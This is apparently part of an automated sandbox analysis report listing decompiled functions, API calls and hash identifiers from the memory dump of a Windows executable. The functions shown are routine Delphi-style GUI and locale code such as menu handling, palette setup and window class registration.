                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466B7A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00466B87
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BB9
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction ID: 325a6e5ce17f83a1198e6ea69a1305357d63e4c9b3ccf8f14f770f2d088acb65
                                                                                • Opcode Fuzzy Hash: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction Fuzzy Hash: 17219FB170011467CB00FA6A9C81A9F72AC5F45728F05062FBA25F7282DA7DE9054369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0044583C(int __eax, void* __edx) {
                                                                                				signed int _t39;
                                                                                				signed int _t40;
                                                                                				intOrPtr _t44;
                                                                                				int _t46;
                                                                                				int _t47;
                                                                                				intOrPtr* _t48;
                                                                                
                                                                                				_t18 = __eax;
                                                                                				_t48 = __eax;
                                                                                				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                                                					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                                                						 *((char*)(__eax + 0x74)) = 1;
                                                                                						return __eax;
                                                                                					}
                                                                                					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                                                					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                                                						return E0044583C(_t19, __edx);
                                                                                					}
                                                                                					_t18 = GetMenuItemCount(E0044596C(__eax));
                                                                                					_t47 = _t18;
                                                                                					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                                                                					while(_t47 > 0) {
                                                                                						_t46 = _t47 - 1;
                                                                                						_t18 = GetMenuState(E0044596C(_t48), _t46, 0x400);
                                                                                						if((_t18 & 0x00000004) == 0) {
                                                                                							_t18 = RemoveMenu(E0044596C(_t48), _t46, 0x400);
                                                                                							_t40 = 1;
                                                                                						}
                                                                                						_t47 = _t47 - 1;
                                                                                					}
                                                                                					if(_t40 != 0) {
                                                                                						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                                                                							L14:
                                                                                							E00445708(_t48);
                                                                                							L15:
                                                                                							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                                                                						}
                                                                                						_t44 =  *0x44435c; // 0x4443a8
                                                                                						if(E00403740( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044596C(_t48)) != 0) {
                                                                                							goto L14;
                                                                                						} else {
                                                                                							DestroyMenu( *(_t48 + 0x34));
                                                                                							 *(_t48 + 0x34) = 0;
                                                                                							goto L15;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t18;
                                                                                			}










                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction ID: 4e1899da5d7f6748348b46f9fe3f1e7a3c70c1476eddfc55fcc1ecb0efe02a5a
                                                                                • Opcode Fuzzy Hash: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction Fuzzy Hash: 44116061B01B48DBFF60BE3A890575B27889F52B58F45442FBD42AB283CE3CDC15829C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045522C(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                                                				intOrPtr _t11;
                                                                                				intOrPtr _t20;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				void* _t33;
                                                                                				struct HWND__** _t34;
                                                                                				struct HWND__* _t35;
                                                                                				struct HWND__* _t36;
                                                                                
                                                                                				_t31 = __ecx;
                                                                                				_t34 = __edx;
                                                                                				_t33 = __eax;
                                                                                				_t30 = 0;
                                                                                				_t11 =  *((intOrPtr*)(__edx + 4));
                                                                                				if(_t11 < 0x100 || _t11 > 0x108) {
                                                                                					L16:
                                                                                					return _t30;
                                                                                				} else {
                                                                                					_t35 = GetCapture();
                                                                                					if(_t35 != 0) {
                                                                                						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x487714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                							_t30 = 1;
                                                                                						}
                                                                                						goto L16;
                                                                                					}
                                                                                					_t36 =  *_t34;
                                                                                					_t2 = _t33 + 0x44; // 0x0
                                                                                					_t20 =  *_t2;
                                                                                					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                                                						L7:
                                                                                						if(E004325B4(_t36, _t31) == 0 && _t36 != 0) {
                                                                                							_t36 = GetParent(_t36);
                                                                                							goto L7;
                                                                                						}
                                                                                						if(_t36 == 0) {
                                                                                							_t36 =  *_t34;
                                                                                						}
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_t36 = E0043BD14(_t20);
                                                                                						L11:
                                                                                						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                							_t30 = 1;
                                                                                						}
                                                                                						goto L16;
                                                                                					}
                                                                                				}
                                                                                			}












                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$CaptureLongWindow
                                                                                • String ID:
                                                                                • API String ID: 1158686931-0
                                                                                • Opcode ID: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction ID: 99e34f074c7de9a5728527735dec4b3c0637da1b987c04b54cf2be62137685ec
                                                                                • Opcode Fuzzy Hash: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction Fuzzy Hash: EF119371204A096FD660FA9AC950B7773DC9B18315F20057AFD59D3383EA6CFC048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004242C8(int __eax) {
                                                                                				int _t21;
                                                                                				signed int _t29;
                                                                                				char _t34;
                                                                                				int _t42;
                                                                                				int _t43;
                                                                                				struct HDC__* _t44;
                                                                                				intOrPtr _t45;
                                                                                
                                                                                				_t21 = __eax;
                                                                                				_t42 = __eax;
                                                                                				_t45 =  *((intOrPtr*)(__eax + 0x28));
                                                                                				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
                                                                                					_t22 =  *((intOrPtr*)(_t45 + 0x14));
                                                                                					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
                                                                                						E00422C48(_t22);
                                                                                					}
                                                                                					_t21 = E004208AC( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
                                                                                					_t43 = _t21;
                                                                                					 *(_t45 + 0x10) = _t43;
                                                                                					if(_t43 == 0) {
                                                                                						_t44 = E004201BC(GetDC(0));
                                                                                						if( *((char*)(_t45 + 0x71)) != 0) {
                                                                                							L9:
                                                                                							_t34 = 1;
                                                                                						} else {
                                                                                							_t29 = GetDeviceCaps(_t44, 0xc);
                                                                                							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                                                                                								goto L9;
                                                                                							} else {
                                                                                								_t34 = 0;
                                                                                							}
                                                                                						}
                                                                                						 *((char*)(_t45 + 0x71)) = _t34;
                                                                                						if(_t34 != 0) {
                                                                                							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
                                                                                						}
                                                                                						_t21 = ReleaseDC(0, _t44);
                                                                                						if( *(_t45 + 0x10) == 0) {
                                                                                							 *((char*)(_t42 + 0x30)) = 1;
                                                                                							return _t21;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}











                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042431E
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                • ReleaseDC.USER32 ref: 0042436C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                • String ID:
                                                                                • API String ID: 2404249990-0
                                                                                • Opcode ID: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction ID: ad94edfb46578ea6a9ee65a130ec521f0314f5c0519a73110df1165b84e8db0c
                                                                                • Opcode Fuzzy Hash: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction Fuzzy Hash: 2F11DA217043659ADB20EF75E4417EF3690EF81358F84012BFC50A62C1D3BC8890C3A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00452988(void* __eax) {
                                                                                				void* _t16;
                                                                                				void* _t39;
                                                                                				signed int _t42;
                                                                                
                                                                                				_t16 = __eax;
                                                                                				_t39 = __eax;
                                                                                				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x46bb20 != 0) {
                                                                                					_t16 = E0043C018(__eax);
                                                                                					if(_t16 != 0) {
                                                                                						_t42 = GetWindowLongA(E0043BD14(_t39), 0xffffffec);
                                                                                						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e2)) != 0) {
                                                                                							if((_t42 & 0x00080000) == 0) {
                                                                                								SetWindowLongA(E0043BD14(_t39), 0xffffffec, _t42 | 0x00080000);
                                                                                							}
                                                                                							return  *0x46bb20(E0043BD14(_t39),  *((intOrPtr*)(_t39 + 0x2e4)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x0046BBA4 |  *0x0046BBAC);
                                                                                						} else {
                                                                                							SetWindowLongA(E0043BD14(_t39), 0xffffffec, _t42 & 0xfff7ffff);
                                                                                							return RedrawWindow(E0043BD14(_t39), 0, 0, 0x485);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t16;
                                                                                			}







                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 004529BC
                                                                                • SetWindowLongA.USER32 ref: 004529EE
                                                                                • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A28
                                                                                • SetWindowLongA.USER32 ref: 00452A41
                                                                                • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A57
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayeredRedraw
                                                                                • String ID:
                                                                                • API String ID: 1758778077-0
                                                                                • Opcode ID: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction ID: bd31bbafe7edde7c7c57afc0455362de60848b0023f737d7f0b8d26ba890ccd5
                                                                                • Opcode Fuzzy Hash: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction Fuzzy Hash: 00112B61A0428125DF506B398C89B5B26485B0A318F14257BBD55EB3C7C7BC884C8BEC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0041C9FC(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                                                				struct _WNDCLASSA _v44;
                                                                                				struct HINSTANCE__* _t6;
                                                                                				CHAR* _t8;
                                                                                				struct HINSTANCE__* _t9;
                                                                                				int _t10;
                                                                                				void* _t11;
                                                                                				struct HINSTANCE__* _t13;
                                                                                				CHAR* _t14;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				CHAR* _t20;
                                                                                				struct HWND__* _t22;
                                                                                
                                                                                				_t6 =  *0x487714; // 0x400000
                                                                                				 *0x46b4d0 = _t6;
                                                                                				_t8 =  *0x46b4e4; // 0x41c9ec
                                                                                				_t9 =  *0x487714; // 0x400000
                                                                                				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                                                				asm("sbb eax, eax");
                                                                                				_t11 = _t10 + 1;
                                                                                				if(_t11 == 0 || L00406CF8 != _v44.lpfnWndProc) {
                                                                                					if(_t11 != 0) {
                                                                                						_t19 =  *0x487714; // 0x400000
                                                                                						_t20 =  *0x46b4e4; // 0x41c9ec
                                                                                						UnregisterClassA(_t20, _t19);
                                                                                					}
                                                                                					RegisterClassA(0x46b4c0);
                                                                                				}
                                                                                				_t13 =  *0x487714; // 0x400000
                                                                                				_t14 =  *0x46b4e4; // 0x41c9ec
                                                                                				_t22 = CreateWindowExA(0x80, _t14, 0x41caac, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
                                                                                				if(_a6 != 0) {
                                                                                					SetWindowLongA(_t22, 0xfffffffc, E0041C940(_a4, _a8));
                                                                                				}
                                                                                				return _t22;
                                                                                			}















                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                                • String ID:
                                                                                • API String ID: 3404767174-0
                                                                                • Opcode ID: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction ID: 7cb591e502674757c5b69656be4cbc4188d227aadbe7795b2df51ffe080876a5
                                                                                • Opcode Fuzzy Hash: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction Fuzzy Hash: 78015E71644108ABD611EB98DDC1F9A33ADEB08344F104526F905E73D2DB75E89187BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E00420814(void* __eax) {
                                                                                				char _v5;
                                                                                				struct HDC__* _v12;
                                                                                				struct HPALETTE__* _t21;
                                                                                				struct HPALETTE__* _t25;
                                                                                				void* _t28;
                                                                                				intOrPtr _t35;
                                                                                				void* _t37;
                                                                                				void* _t39;
                                                                                				intOrPtr _t40;
                                                                                
                                                                                				_t37 = _t39;
                                                                                				_t40 = _t39 + 0xfffffff8;
                                                                                				_t28 = __eax;
                                                                                				_v5 = 0;
                                                                                				if( *0x487a28 == 0) {
                                                                                					return _v5;
                                                                                				} else {
                                                                                					_v12 = GetDC(0);
                                                                                					_push(_t37);
                                                                                					_push(0x42089a);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t40;
                                                                                					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
                                                                                						_t21 =  *0x487a28; // 0xf50806b6
                                                                                						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
                                                                                						_t25 =  *0x487a28; // 0xf50806b6
                                                                                						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
                                                                                						_v5 = 1;
                                                                                					}
                                                                                					_pop(_t35);
                                                                                					 *[fs:eax] = _t35;
                                                                                					_push(0x4208a1);
                                                                                					return ReleaseDC(0, _v12);
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042082C
                                                                                • GetDeviceCaps.GDI32(?,00000068), ref: 00420848
                                                                                • GetPaletteEntries.GDI32(F50806B6,00000000,00000008,?), ref: 00420860
                                                                                • GetPaletteEntries.GDI32(F50806B6,00000008,00000008,?), ref: 00420878
                                                                                • ReleaseDC.USER32 ref: 00420894
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: EntriesPalette$CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 3128150645-0
                                                                                • Opcode ID: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction ID: 594b4552e34af1e9033683bc2504567bb3921c278d2cf1e53935ece89b8d96ff
                                                                                • Opcode Fuzzy Hash: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction Fuzzy Hash: F81148317483046EEB00EBA4EC92F6E7BE8E708714F5040AAF604EA5C1C9B99404C368
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E00461FD4(void* __eax) {
                                                                                				struct HDC__* _v8;
                                                                                				int _t13;
                                                                                				void* _t25;
                                                                                				intOrPtr _t32;
                                                                                				int _t35;
                                                                                				intOrPtr _t37;
                                                                                				intOrPtr _t39;
                                                                                
                                                                                				_t37 = _t39;
                                                                                				_t25 = __eax;
                                                                                				if( *((char*)(__eax + 0x2e8)) == 1) {
                                                                                					return __eax;
                                                                                				} else {
                                                                                					_v8 = GetDC(0);
                                                                                					_push(_t37);
                                                                                					_push(0x462059);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t39;
                                                                                					_t13 = GetDeviceCaps(_v8, 0x5a);
                                                                                					_t35 = MulDiv(E0041EDD0( *((intOrPtr*)(_t25 + 0x68))), _t13, 0x48);
                                                                                					 *(_t25 + 0x2b0) = _t35;
                                                                                					E0045F9D0(_t25, MulDiv(_t35, 0x78, 0x64));
                                                                                					 *((intOrPtr*)(_t25 + 0x2e4)) =  *((intOrPtr*)(_t25 + 0x234));
                                                                                					_pop(_t32);
                                                                                					 *[fs:eax] = _t32;
                                                                                					_push(0x462060);
                                                                                					return ReleaseDC(0, _v8);
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00461FE7
                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 00462005
                                                                                  • Part of subcall function 0041EDD0: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041EDE1
                                                                                • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462014
                                                                                • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00462026
                                                                                • ReleaseDC.USER32 ref: 00462053
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 127614599-0
                                                                                • Opcode ID: 81a1225c8f66191a4a7340aa42bca49ced41bc4e24999cd6ac80d4dc4a324277
                                                                                • Instruction ID: c87c45dc7123c015144318748a061a248af25c350a3f3b7478ec6eef4c47663c
                                                                                • Opcode Fuzzy Hash: 81a1225c8f66191a4a7340aa42bca49ced41bc4e24999cd6ac80d4dc4a324277
                                                                                • Instruction Fuzzy Hash: A501D2B17887047FE700EB65CD46B5A3798DB45704F11007AFA08EB2C2D5BD5C0087A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00409B90(void* __esi, void* __eflags) {
                                                                                				char _v8;
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr _t26;
                                                                                				void* _t27;
                                                                                				long _t29;
                                                                                				intOrPtr _t32;
                                                                                				void* _t33;
                                                                                
                                                                                				_t33 = __eflags;
                                                                                				_push(0);
                                                                                				_push(_t32);
                                                                                				_push(0x409c27);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t32;
                                                                                				E00409908(GetThreadLocale(), 0x409c3c, 0x100b,  &_v8);
                                                                                				_t29 = E00408708(0x409c3c, 1, _t33);
                                                                                				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                					EnumCalendarInfoA(E00409ADC, GetThreadLocale(), _t29, 4);
                                                                                					_t27 = 7;
                                                                                					_t18 = 0x48781c;
                                                                                					do {
                                                                                						 *_t18 = 0xffffffff;
                                                                                						_t18 = _t18 + 4;
                                                                                						_t27 = _t27 - 1;
                                                                                					} while (_t27 != 0);
                                                                                					EnumCalendarInfoA(E00409B18, GetThreadLocale(), _t29, 3);
                                                                                				}
                                                                                				_pop(_t26);
                                                                                				 *[fs:eax] = _t26;
                                                                                				_push(E00409C2E);
                                                                                				return E00404320( &_v8);
                                                                                			}











                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409C27,?,?,00000000), ref: 00409BA8
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409C27,?,?,00000000), ref: 00409BD8
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009ADC,00000000,00000000,00000004), ref: 00409BE3
                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409C27,?,?,00000000), ref: 00409C01
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009B18,00000000,00000000,00000003), ref: 00409C0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                • String ID:
                                                                                • API String ID: 4102113445-0
                                                                                • Opcode ID: f9b5190e816450cd29884f56873aa7a7404d889235a34cc2af808d8aafdeda29
                                                                                • Instruction ID: 4bfb94394b26c1de61b809fad384f0f37ea96256bdb679008e2ec987b4910443
                                                                                • Opcode Fuzzy Hash: f9b5190e816450cd29884f56873aa7a7404d889235a34cc2af808d8aafdeda29
                                                                                • Instruction Fuzzy Hash: 4201F7717042046BE70176658D12B5E729CDB86724FB14536F501FB6C2D67C9E00466C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00453F88() {
                                                                                				void* _t2;
                                                                                				void* _t5;
                                                                                				void* _t8;
                                                                                				struct HHOOK__* _t10;
                                                                                
                                                                                				if( *0x487c14 != 0) {
                                                                                					_t10 =  *0x487c14; // 0x0
                                                                                					UnhookWindowsHookEx(_t10);
                                                                                				}
                                                                                				 *0x487c14 = 0;
                                                                                				if( *0x487c18 != 0) {
                                                                                					_t2 =  *0x487c10; // 0x0
                                                                                					SetEvent(_t2);
                                                                                					if(GetCurrentThreadId() !=  *0x487c0c) {
                                                                                						_t8 =  *0x487c18; // 0x0
                                                                                						WaitForSingleObject(_t8, 0xffffffff);
                                                                                					}
                                                                                					_t5 =  *0x487c18; // 0x0
                                                                                					CloseHandle(_t5);
                                                                                					 *0x487c18 = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				return 0;
                                                                                			}








                                                                                APIs
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00453F97
                                                                                • SetEvent.KERNEL32(00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FB2
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453FB7
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FCC
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FD7
                                                                                Memory Dump Source
